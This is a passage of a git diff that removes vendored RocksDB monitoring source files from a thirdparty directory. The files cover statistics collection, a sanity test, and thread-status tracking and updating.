-          "%s statistics Percentiles :=> 50 : %f 95 : %f 99 : %f 100 : %f\n",
-          h.second.c_str(), hData.median, hData.percentile95,
-          hData.percentile99, hData.max);
-      res.append(buffer);
-    }
-  }
-  res.shrink_to_fit();
-  return res;
-}
-
-bool StatisticsImpl::HistEnabledForType(uint32_t type) const {
-  if (LIKELY(!enable_internal_stats_)) {
-    return type < HISTOGRAM_ENUM_MAX;
-  }
-  return true;
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/statistics.h b/thirdparty/rocksdb/monitoring/statistics.h
deleted file mode 100644
index 6e91521..0000000
--- a/thirdparty/rocksdb/monitoring/statistics.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include "rocksdb/statistics.h"
-
-#include <vector>
-#include <atomic>
-#include <string>
-
-#include "monitoring/histogram.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "util/core_local.h"
-#include "util/mutexlock.h"
-
-#ifdef __clang__
-#define ROCKSDB_FIELD_UNUSED __attribute__((__unused__))
-#else
-#define ROCKSDB_FIELD_UNUSED
-#endif  // __clang__
-
-namespace rocksdb {
-
-enum TickersInternal : uint32_t {
-  INTERNAL_TICKER_ENUM_START = TICKER_ENUM_MAX,
-  INTERNAL_TICKER_ENUM_MAX
-};
-
-enum HistogramsInternal : uint32_t {
-  INTERNAL_HISTOGRAM_START = HISTOGRAM_ENUM_MAX,
-  INTERNAL_HISTOGRAM_ENUM_MAX
-};
-
-
-class StatisticsImpl : public Statistics {
- public:
-  StatisticsImpl(std::shared_ptr<Statistics> stats,
-                 bool enable_internal_stats);
-  virtual ~StatisticsImpl();
-
-  virtual uint64_t getTickerCount(uint32_t ticker_type) const override;
-  virtual void histogramData(uint32_t histogram_type,
-                             HistogramData* const data) const override;
-  std::string getHistogramString(uint32_t histogram_type) const override;
-
-  virtual void setTickerCount(uint32_t ticker_type, uint64_t count) override;
-  virtual uint64_t getAndResetTickerCount(uint32_t ticker_type) override;
-  virtual void recordTick(uint32_t ticker_type, uint64_t count) override;
-  virtual void measureTime(uint32_t histogram_type, uint64_t value) override;
-
-  virtual Status Reset() override;
-  virtual std::string ToString() const override;
-  virtual bool HistEnabledForType(uint32_t type) const override;
-
- private:
-  // If non-nullptr, forwards updates to the object pointed to by `stats_`.
-  std::shared_ptr<Statistics> stats_;
-  // TODO(ajkr): clean this up since there are no internal stats anymore
-  bool enable_internal_stats_;
-  // Synchronizes anything that operates across other cores' local data,
-  // such that operations like Reset() can be performed atomically.
-  mutable port::Mutex aggregate_lock_;
-
-  // The ticker/histogram data are stored in this structure, which we will store
-  // per-core. It is cache-aligned, so tickers/histograms belonging to different
-  // cores can never share the same cache line.
-  //
-  // Alignment attributes expand to nothing depending on the platform
-  struct StatisticsData {
-    std::atomic_uint_fast64_t tickers_[INTERNAL_TICKER_ENUM_MAX] = {{0}};
-    HistogramImpl histograms_[INTERNAL_HISTOGRAM_ENUM_MAX];
-    char
-        padding[(CACHE_LINE_SIZE -
-                 (INTERNAL_TICKER_ENUM_MAX * sizeof(std::atomic_uint_fast64_t) +
-                  INTERNAL_HISTOGRAM_ENUM_MAX * sizeof(HistogramImpl)) %
-                     CACHE_LINE_SIZE) %
-                CACHE_LINE_SIZE] ROCKSDB_FIELD_UNUSED;
-  };
-
-  static_assert(sizeof(StatisticsData) % 64 == 0, "Expected 64-byte aligned");
-
-  CoreLocalArray<StatisticsData> per_core_stats_;
-
-  uint64_t getTickerCountLocked(uint32_t ticker_type) const;
-  std::unique_ptr<HistogramImpl> getHistogramImplLocked(
-      uint32_t histogram_type) const;
-  void setTickerCountLocked(uint32_t ticker_type, uint64_t count);
-};
-
-// Utility functions
-inline void MeasureTime(Statistics* statistics, uint32_t histogram_type,
-                        uint64_t value) {
-  if (statistics) {
-    statistics->measureTime(histogram_type, value);
-  }
-}
-
-inline void RecordTick(Statistics* statistics, uint32_t ticker_type,
-                       uint64_t count = 1) {
-  if (statistics) {
-    statistics->recordTick(ticker_type, count);
-  }
-}
-
-inline void SetTickerCount(Statistics* statistics, uint32_t ticker_type,
-                           uint64_t count) {
-  if (statistics) {
-    statistics->setTickerCount(ticker_type, count);
-  }
-}
-
-}
diff --git a/thirdparty/rocksdb/monitoring/statistics_test.cc b/thirdparty/rocksdb/monitoring/statistics_test.cc
deleted file mode 100644
index 43aacde..0000000
--- a/thirdparty/rocksdb/monitoring/statistics_test.cc
+++ /dev/null
@@ -1,35 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include "port/stack_trace.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class StatisticsTest : public testing::Test {};
-
-// Sanity check to make sure that contents and order of TickersNameMap
-// match Tickers enum
-TEST_F(StatisticsTest, Sanity) {
-  EXPECT_EQ(static_cast<size_t>(Tickers::TICKER_ENUM_MAX),
-            TickersNameMap.size());
-
-  for (uint32_t t = 0; t < Tickers::TICKER_ENUM_MAX; t++) {
-    auto pair = TickersNameMap[static_cast<size_t>(t)];
-    ASSERT_EQ(pair.first, t) << "Miss match at " << pair.second;
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/monitoring/thread_status_impl.cc b/thirdparty/rocksdb/monitoring/thread_status_impl.cc
deleted file mode 100644
index e263ce6..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_impl.cc
+++ /dev/null
@@ -1,167 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#include <sstream>
-
-#include "rocksdb/env.h"
-#include "rocksdb/thread_status.h"
-#include "util/string_util.h"
-#include "util/thread_operation.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-const std::string& ThreadStatus::GetThreadTypeName(
-    ThreadStatus::ThreadType thread_type) {
-  static std::string thread_type_names[NUM_THREAD_TYPES + 1] = {
-      "High Pri", "Low Pri", "User", "Unknown"};
-  if (thread_type < 0 || thread_type >= NUM_THREAD_TYPES) {
-    return thread_type_names[NUM_THREAD_TYPES];  // "Unknown"
-  }
-  return thread_type_names[thread_type];
-}
-
-const std::string& ThreadStatus::GetOperationName(
-    ThreadStatus::OperationType op_type) {
-  if (op_type < 0 || op_type >= NUM_OP_TYPES) {
-    return global_operation_table[OP_UNKNOWN].name;
-  }
-  return global_operation_table[op_type].name;
-}
-
-const std::string& ThreadStatus::GetOperationStageName(
-    ThreadStatus::OperationStage stage) {
-  if (stage < 0 || stage >= NUM_OP_STAGES) {
-    return global_op_stage_table[STAGE_UNKNOWN].name;
-  }
-  return global_op_stage_table[stage].name;
-}
-
-const std::string& ThreadStatus::GetStateName(
-    ThreadStatus::StateType state_type) {
-  if (state_type < 0 || state_type >= NUM_STATE_TYPES) {
-    return global_state_table[STATE_UNKNOWN].name;
-  }
-  return global_state_table[state_type].name;
-}
-
-const std::string ThreadStatus::MicrosToString(uint64_t micros) {
-  if (micros == 0) {
-    return "";
-  }
-  const int kBufferLen = 100;
-  char buffer[kBufferLen];
-  AppendHumanMicros(micros, buffer, kBufferLen, false);
-  return std::string(buffer);
-}
-
-const std::string& ThreadStatus::GetOperationPropertyName(
-    ThreadStatus::OperationType op_type, int i) {
-  static const std::string empty_str = "";
-  switch (op_type) {
-    case ThreadStatus::OP_COMPACTION:
-      if (i >= NUM_COMPACTION_PROPERTIES) {
-        return empty_str;
-      }
-      return compaction_operation_properties[i].name;
-    case ThreadStatus::OP_FLUSH:
-      if (i >= NUM_FLUSH_PROPERTIES) {
-        return empty_str;
-      }
-      return flush_operation_properties[i].name;
-    default:
-      return empty_str;
-  }
-}
-
-std::map<std::string, uint64_t>
-    ThreadStatus::InterpretOperationProperties(
-    ThreadStatus::OperationType op_type,
-    const uint64_t* op_properties) {
-  int num_properties;
-  switch (op_type) {
-    case OP_COMPACTION:
-      num_properties = NUM_COMPACTION_PROPERTIES;
-      break;
-    case OP_FLUSH:
-      num_properties = NUM_FLUSH_PROPERTIES;
-      break;
-    default:
-      num_properties = 0;
-  }
-
-  std::map<std::string, uint64_t> property_map;
-  for (int i = 0; i < num_properties; ++i) {
-    if (op_type == OP_COMPACTION &&
-        i == COMPACTION_INPUT_OUTPUT_LEVEL) {
-      property_map.insert(
-          {"BaseInputLevel", op_properties[i] >> 32});
-      property_map.insert(
-          {"OutputLevel", op_properties[i] % (uint64_t(1) << 32U)});
-    } else if (op_type == OP_COMPACTION &&
-               i == COMPACTION_PROP_FLAGS) {
-      property_map.insert(
-          {"IsManual", ((op_properties[i] & 2) >> 1)});
-      property_map.insert(
-          {"IsDeletion", ((op_properties[i] & 4) >> 2)});
-      property_map.insert(
-          {"IsTrivialMove", ((op_properties[i] & 8) >> 3)});
-    } else {
-      property_map.insert(
-          {GetOperationPropertyName(op_type, i), op_properties[i]});
-    }
-  }
-  return property_map;
-}
-
-
-#else
-
-const std::string& ThreadStatus::GetThreadTypeName(
-    ThreadStatus::ThreadType thread_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationName(
-    ThreadStatus::OperationType op_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationStageName(
-    ThreadStatus::OperationStage stage) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetStateName(
-    ThreadStatus::StateType state_type) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string ThreadStatus::MicrosToString(
-    uint64_t op_elapsed_time) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-const std::string& ThreadStatus::GetOperationPropertyName(
-    ThreadStatus::OperationType op_type, int i) {
-  static std::string dummy_str = "";
-  return dummy_str;
-}
-
-std::map<std::string, uint64_t>
-    ThreadStatus::InterpretOperationProperties(
-    ThreadStatus::OperationType op_type,
-    const uint64_t* op_properties) {
-  return std::map<std::string, uint64_t>();
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater.cc b/thirdparty/rocksdb/monitoring/thread_status_updater.cc
deleted file mode 100644
index 7441c35..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater.cc
+++ /dev/null
@@ -1,349 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "monitoring/thread_status_updater.h"
-#include <memory>
-#include "port/likely.h"
-#include "rocksdb/env.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-__thread ThreadStatusData* ThreadStatusUpdater::thread_status_data_ = nullptr;
-
-void ThreadStatusUpdater::RegisterThread(
-    ThreadStatus::ThreadType ttype, uint64_t thread_id) {
-  if (UNLIKELY(thread_status_data_ == nullptr)) {
-    thread_status_data_ = new ThreadStatusData();
-    thread_status_data_->thread_type = ttype;
-    thread_status_data_->thread_id = thread_id;
-    std::lock_guard<std::mutex> lck(thread_list_mutex_);
-    thread_data_set_.insert(thread_status_data_);
-  }
-
-  ClearThreadOperationProperties();
-}
-
-void ThreadStatusUpdater::UnregisterThread() {
-  if (thread_status_data_ != nullptr) {
-    std::lock_guard<std::mutex> lck(thread_list_mutex_);
-    thread_data_set_.erase(thread_status_data_);
-    delete thread_status_data_;
-    thread_status_data_ = nullptr;
-  }
-}
-
-void ThreadStatusUpdater::ResetThreadStatus() {
-  ClearThreadState();
-  ClearThreadOperation();
-  SetColumnFamilyInfoKey(nullptr);
-}
-
-void ThreadStatusUpdater::SetColumnFamilyInfoKey(
-    const void* cf_key) {
-  auto* data = Get();
-  if (data == nullptr) {
-    return;
-  }
-  // set the tracking flag based on whether cf_key is non-null or not.
-  // If enable_thread_tracking is set to false, the input cf_key
-  // would be nullptr.
-  data->enable_tracking = (cf_key != nullptr);
-  data->cf_key.store(const_cast<void*>(cf_key), std::memory_order_relaxed);
-}
-
-const void* ThreadStatusUpdater::GetColumnFamilyInfoKey() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return nullptr;
-  }
-  return data->cf_key.load(std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetThreadOperation(
-    const ThreadStatus::OperationType type) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  // NOTE: Our practice here is to set all the thread operation properties
-  //       and stage before we set thread operation, and thread operation
-  //       will be set in std::memory_order_release.  This is to ensure
-  //       whenever a thread operation is not OP_UNKNOWN, we will always
-  //       have a consistent information on its properties.
-  data->operation_type.store(type, std::memory_order_release);
-  if (type == ThreadStatus::OP_UNKNOWN) {
-    data->operation_stage.store(ThreadStatus::STAGE_UNKNOWN,
-        std::memory_order_relaxed);
-    ClearThreadOperationProperties();
-  }
-}
-
-void ThreadStatusUpdater::SetThreadOperationProperty(
-    int i, uint64_t value) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_properties[i].store(value, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::IncreaseThreadOperationProperty(
-    int i, uint64_t delta) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_properties[i].fetch_add(delta, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetOperationStartTime(const uint64_t start_time) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->op_start_time.store(start_time, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::ClearThreadOperation() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->operation_stage.store(ThreadStatus::STAGE_UNKNOWN,
-      std::memory_order_relaxed);
-  data->operation_type.store(
-      ThreadStatus::OP_UNKNOWN, std::memory_order_relaxed);
-  ClearThreadOperationProperties();
-}
-
-void ThreadStatusUpdater::ClearThreadOperationProperties() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  for (int i = 0; i < ThreadStatus::kNumOperationProperties; ++i) {
-    data->op_properties[i].store(0, std::memory_order_relaxed);
-  }
-}
-
-ThreadStatus::OperationStage ThreadStatusUpdater::SetThreadOperationStage(
-    ThreadStatus::OperationStage stage) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return ThreadStatus::STAGE_UNKNOWN;
-  }
-  return data->operation_stage.exchange(
-      stage, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::SetThreadState(
-    const ThreadStatus::StateType type) {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->state_type.store(type, std::memory_order_relaxed);
-}
-
-void ThreadStatusUpdater::ClearThreadState() {
-  auto* data = GetLocalThreadStatus();
-  if (data == nullptr) {
-    return;
-  }
-  data->state_type.store(
-      ThreadStatus::STATE_UNKNOWN, std::memory_order_relaxed);
-}
-
-Status ThreadStatusUpdater::GetThreadList(
-    std::vector<ThreadStatus>* thread_list) {
-  thread_list->clear();
-  std::vector<std::shared_ptr<ThreadStatusData>> valid_list;
-  uint64_t now_micros = Env::Default()->NowMicros();
-
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  for (auto* thread_data : thread_data_set_) {
-    assert(thread_data);
-    auto thread_id = thread_data->thread_id.load(
-        std::memory_order_relaxed);
-    auto thread_type = thread_data->thread_type.load(
-        std::memory_order_relaxed);
-    // Since any change to cf_info_map requires thread_list_mutex,
-    // which is currently held by GetThreadList(), here we can safely
-    // use "memory_order_relaxed" to load the cf_key.
-    auto cf_key = thread_data->cf_key.load(
-        std::memory_order_relaxed);
-    auto iter = cf_info_map_.find(cf_key);
-    auto* cf_info = iter != cf_info_map_.end() ?
-        iter->second.get() : nullptr;
-    const std::string* db_name = nullptr;
-    const std::string* cf_name = nullptr;
-    ThreadStatus::OperationType op_type = ThreadStatus::OP_UNKNOWN;
-    ThreadStatus::OperationStage op_stage = ThreadStatus::STAGE_UNKNOWN;
-    ThreadStatus::StateType state_type = ThreadStatus::STATE_UNKNOWN;
-    uint64_t op_elapsed_micros = 0;
-    uint64_t op_props[ThreadStatus::kNumOperationProperties] = {0};
-    if (cf_info != nullptr) {
-      db_name = &cf_info->db_name;
-      cf_name = &cf_info->cf_name;
-      op_type = thread_data->operation_type.load(
-          std::memory_order_acquire);
-      // display lower-level info only when higher-level info is available.
-      if (op_type != ThreadStatus::OP_UNKNOWN) {
-        op_elapsed_micros = now_micros - thread_data->op_start_time.load(
-            std::memory_order_relaxed);
-        op_stage = thread_data->operation_stage.load(
-            std::memory_order_relaxed);
-        state_type = thread_data->state_type.load(
-            std::memory_order_relaxed);
-        for (int i = 0; i < ThreadStatus::kNumOperationProperties; ++i) {
-          op_props[i] = thread_data->op_properties[i].load(
-              std::memory_order_relaxed);
-        }
-      }
-    }
-    thread_list->emplace_back(
-        thread_id, thread_type,
-        db_name ? *db_name : "",
-        cf_name ? *cf_name : "",
-        op_type, op_elapsed_micros, op_stage, op_props,
-        state_type);
-  }
-
-  return Status::OK();
-}
-
-ThreadStatusData* ThreadStatusUpdater::GetLocalThreadStatus() {
-  if (thread_status_data_ == nullptr) {
-    return nullptr;
-  }
-  if (!thread_status_data_->enable_tracking) {
-    assert(thread_status_data_->cf_key.load(
-        std::memory_order_relaxed) == nullptr);
-    return nullptr;
-  }
-  return thread_status_data_;
-}
-
-void ThreadStatusUpdater::NewColumnFamilyInfo(
-    const void* db_key, const std::string& db_name,
-    const void* cf_key, const std::string& cf_name) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-
-  cf_info_map_[cf_key].reset(
-      new ConstantColumnFamilyInfo(db_key, db_name, cf_name));
-  db_key_map_[db_key].insert(cf_key);
-}
-
-void ThreadStatusUpdater::EraseColumnFamilyInfo(const void* cf_key) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  auto cf_pair = cf_info_map_.find(cf_key);
-  if (cf_pair == cf_info_map_.end()) {
-    return;
-  }
-
-  auto* cf_info = cf_pair->second.get();
-  assert(cf_info);
-
-  // Remove its entry from db_key_map_ by the following steps:
-  // 1. Obtain the entry in db_key_map_ whose set contains cf_key
-  // 2. Remove it from the set.
-  auto db_pair = db_key_map_.find(cf_info->db_key);
-  assert(db_pair != db_key_map_.end());
-  size_t result __attribute__((unused)) = db_pair->second.erase(cf_key);
-  assert(result);
-
-  cf_pair->second.reset();
-  result = cf_info_map_.erase(cf_key);
-  assert(result);
-}
-
-void ThreadStatusUpdater::EraseDatabaseInfo(const void* db_key) {
-  // Acquiring same lock as GetThreadList() to guarantee
-  // a consistent view of global column family table (cf_info_map).
-  std::lock_guard<std::mutex> lck(thread_list_mutex_);
-  auto db_pair = db_key_map_.find(db_key);
-  if (UNLIKELY(db_pair == db_key_map_.end())) {
-    // In some occasional cases such as DB::Open fails, we won't
-    // register ColumnFamilyInfo for a db.
-    return;
-  }
-
-  size_t result __attribute__((unused)) = 0;
-  for (auto cf_key : db_pair->second) {
-    auto cf_pair = cf_info_map_.find(cf_key);
-    if (cf_pair == cf_info_map_.end()) {
-      continue;
-    }
-    cf_pair->second.reset();
-    result = cf_info_map_.erase(cf_key);
-    assert(result);
-  }
-  db_key_map_.erase(db_key);
-}
-
-#else
-
-void ThreadStatusUpdater::RegisterThread(
-    ThreadStatus::ThreadType ttype, uint64_t thread_id) {
-}
-
-void ThreadStatusUpdater::UnregisterThread() {
-}
-
-void ThreadStatusUpdater::ResetThreadStatus() {
-}
-
-void ThreadStatusUpdater::SetColumnFamilyInfoKey(
-    const void* cf_key) {
-}
-
-void ThreadStatusUpdater::SetThreadOperation(
-    const ThreadStatus::OperationType type) {
-}
-
-void ThreadStatusUpdater::ClearThreadOperation() {
-}
-
-void ThreadStatusUpdater::SetThreadState(
-    const ThreadStatus::StateType type) {
-}
-
-void ThreadStatusUpdater::ClearThreadState() {
-}
-
-Status ThreadStatusUpdater::GetThreadList(
-    std::vector<ThreadStatus>* thread_list) {
-  return Status::NotSupported(
-      "GetThreadList is not supported in the current running environment.");
-}
-
-void ThreadStatusUpdater::NewColumnFamilyInfo(
-    const void* db_key, const std::string& db_name,
-    const void* cf_key, const std::string& cf_name) {
-}
-
-void ThreadStatusUpdater::EraseColumnFamilyInfo(const void* cf_key) {
-}
-
-void ThreadStatusUpdater::EraseDatabaseInfo(const void* db_key) {
-}
-
-void ThreadStatusUpdater::SetThreadOperationProperty(
-    int i, uint64_t value) {
-}
-
-void ThreadStatusUpdater::IncreaseThreadOperationProperty(
-    int i, uint64_t delta) {
-}
-
-#endif  // ROCKSDB_USING_THREAD_STATUS
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater.h b/thirdparty/rocksdb/monitoring/thread_status_updater.h
deleted file mode 100644
index 69b4d4f..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater.h
+++ /dev/null
@@ -1,234 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// The implementation of ThreadStatus.
-//
-// Note that we make get and set access to ThreadStatusData lockless.
-// As a result, ThreadStatusData as a whole is not atomic.  However,
-// we guarantee consistent ThreadStatusData all the time whenever
-// user call GetThreadList().  This consistency guarantee is done
-// by having the following constraint in the internal implementation
-// of set and get order:
-//
-// 1. When reset any information in ThreadStatusData, always start from
-//    clearing up the lower-level information first.
-// 2. When setting any information in ThreadStatusData, always start from
-//    setting the higher-level information.
-// 3. When returning ThreadStatusData to the user, fields are fetched from
-//    higher-level to lower-level.  In addition, where there's a nullptr
-//    in one field, then all fields that has lower-level than that field
-//    should be ignored.
-//
-// The high to low level information would be:
-// thread_id > thread_type > db > cf > operation > state
-//
-// This means user might not always get full information, but whenever
-// returned by the GetThreadList() is guaranteed to be consistent.
-#pragma once
-#include <atomic>
-#include <list>
-#include <memory>
-#include <mutex>
-#include <string>
-#include <unordered_map>
-#include <unordered_set>
-#include <vector>
-
-#include "rocksdb/status.h"
-#include "rocksdb/thread_status.h"
-#include "port/port.h"
-#include "util/thread_operation.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-
-// The structure that keeps constant information about a column family.
-struct ConstantColumnFamilyInfo {
-#ifdef ROCKSDB_USING_THREAD_STATUS
- public:
-  ConstantColumnFamilyInfo(
-      const void* _db_key,
-      const std::string& _db_name,
-      const std::string& _cf_name) :
-      db_key(_db_key), db_name(_db_name), cf_name(_cf_name) {}
-  const void* db_key;
-  const std::string db_name;
-  const std::string cf_name;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-// the internal data-structure that is used to reflect the current
-// status of a thread using a set of atomic pointers.
-struct ThreadStatusData {
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  explicit ThreadStatusData() : enable_tracking(false) {
-    thread_id.store(0);
-    thread_type.store(ThreadStatus::USER);
-    cf_key.store(nullptr);
-    operation_type.store(ThreadStatus::OP_UNKNOWN);
-    op_start_time.store(0);
-    state_type.store(ThreadStatus::STATE_UNKNOWN);
-  }
-
-  // A flag to indicate whether the thread tracking is enabled
-  // in the current thread.  This value will be updated based on whether
-  // the associated Options::enable_thread_tracking is set to true
-  // in ThreadStatusUtil::SetColumnFamily().
-  //
-  // If set to false, then SetThreadOperation and SetThreadState
-  // will be no-op.
-  bool enable_tracking;
-
-  std::atomic<uint64_t> thread_id;
-  std::atomic<ThreadStatus::ThreadType> thread_type;
-  std::atomic<void*> cf_key;
-  std::atomic<ThreadStatus::OperationType> operation_type;
-  std::atomic<uint64_t> op_start_time;
-  std::atomic<ThreadStatus::OperationStage> operation_stage;
-  std::atomic<uint64_t> op_properties[ThreadStatus::kNumOperationProperties];
-  std::atomic<ThreadStatus::StateType> state_type;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-// The class that stores and updates the status of the current thread
-// using a thread-local ThreadStatusData.
-//
-// In most of the case, you should use ThreadStatusUtil to update
-// the status of the current thread instead of using ThreadSatusUpdater
-// directly.
-//
-// @see ThreadStatusUtil
-class ThreadStatusUpdater {
- public:
-  ThreadStatusUpdater() {}
-
-  // Releases all ThreadStatusData of all active threads.
-  virtual ~ThreadStatusUpdater() {}
-
-  // Unregister the current thread.
-  void UnregisterThread();
-
-  // Reset the status of the current thread.  This includes resetting
-  // ColumnFamilyInfoKey, ThreadOperation, and ThreadState.
-  void ResetThreadStatus();
-
-  // Set the id of the current thread.
-  void SetThreadID(uint64_t thread_id);
-
-  // Register the current thread for tracking.
-  void RegisterThread(ThreadStatus::ThreadType ttype, uint64_t thread_id);
-
-  // Update the column-family info of the current thread by setting
-  // its thread-local pointer of ThreadStateInfo to the correct entry.
-  void SetColumnFamilyInfoKey(const void* cf_key);
-
-  // returns the column family info key.
-  const void* GetColumnFamilyInfoKey();
-
-  // Update the thread operation of the current thread.
-  void SetThreadOperation(const ThreadStatus::OperationType type);
-
-  // The start time of the current thread operation.  It is in the format
-  // of micro-seconds since some fixed point in time.
-  void SetOperationStartTime(const uint64_t start_time);
-
-  // Set the "i"th property of the current operation.
-  //
-  // NOTE: Our practice here is to set all the thread operation properties
-  //       and stage before we set thread operation, and thread operation
-  //       will be set in std::memory_order_release.  This is to ensure
-  //       whenever a thread operation is not OP_UNKNOWN, we will always
-  //       have a consistent information on its properties.
-  void SetThreadOperationProperty(
-      int i, uint64_t value);
-
-  // Increase the "i"th property of the current operation with
-  // the specified delta.
-  void IncreaseThreadOperationProperty(
-      int i, uint64_t delta);
-
-  // Update the thread operation stage of the current thread.
-  ThreadStatus::OperationStage SetThreadOperationStage(
-      const ThreadStatus::OperationStage stage);
-
-  // Clear thread operation of the current thread.
-  void ClearThreadOperation();
-
-  // Reset all thread-operation-properties to 0.
-  void ClearThreadOperationProperties();
-
-  // Update the thread state of the current thread.
-  void SetThreadState(const ThreadStatus::StateType type);
-
-  // Clear the thread state of the current thread.
-  void ClearThreadState();
-
-  // Obtain the status of all active registered threads.
-  Status GetThreadList(
-      std::vector<ThreadStatus>* thread_list);
-
-  // Create an entry in the global ColumnFamilyInfo table for the
-  // specified column family.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  void NewColumnFamilyInfo(
-      const void* db_key, const std::string& db_name,
-      const void* cf_key, const std::string& cf_name);
-
-  // Erase all ConstantColumnFamilyInfo that is associated with the
-  // specified db instance.  This function should be called only when
-  // the current thread does not hold db_mutex.
-  void EraseDatabaseInfo(const void* db_key);
-
-  // Erase the ConstantColumnFamilyInfo that is associated with the
-  // specified ColumnFamilyData.  This function should be called only
-  // when the current thread does not hold db_mutex.
-  void EraseColumnFamilyInfo(const void* cf_key);
-
-  // Verifies whether the input ColumnFamilyHandles matches
-  // the information stored in the current cf_info_map.
-  void TEST_VerifyColumnFamilyInfoMap(
-      const std::vector<ColumnFamilyHandle*>& handles,
-      bool check_exist);
-
- protected:
-#ifdef ROCKSDB_USING_THREAD_STATUS
-  // The thread-local variable for storing thread status.
-  static __thread ThreadStatusData* thread_status_data_;
-
-  // Returns the pointer to the thread status data only when the
-  // thread status data is non-null and has enable_tracking == true.
-  ThreadStatusData* GetLocalThreadStatus();
-
-  // Directly returns the pointer to thread_status_data_ without
-  // checking whether enabling_tracking is true of not.
-  ThreadStatusData* Get() {
-    return thread_status_data_;
-  }
-
-  // The mutex that protects cf_info_map and db_key_map.
-  std::mutex thread_list_mutex_;
-
-  // The current status data of all active threads.
-  std::unordered_set<ThreadStatusData*> thread_data_set_;
-
-  // A global map that keeps the column family information.  It is stored
-  // globally instead of inside DB is to avoid the situation where DB is
-  // closing while GetThreadList function already get the pointer to its
-  // CopnstantColumnFamilyInfo.
-  std::unordered_map<
-      const void*, std::unique_ptr<ConstantColumnFamilyInfo>> cf_info_map_;
-
-  // A db_key to cf_key map that allows erasing elements in cf_info_map
-  // associated to the same db_key faster.
-  std::unordered_map<
-      const void*, std::unordered_set<const void*>> db_key_map_;
-
-#else
-  static ThreadStatusData* thread_status_data_;
-#endif  // ROCKSDB_USING_THREAD_STATUS
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc b/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc
deleted file mode 100644
index eec52e1..0000000
--- a/thirdparty/rocksdb/monitoring/thread_status_updater_debug.cc
+++ /dev/null
@@ -1,46 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
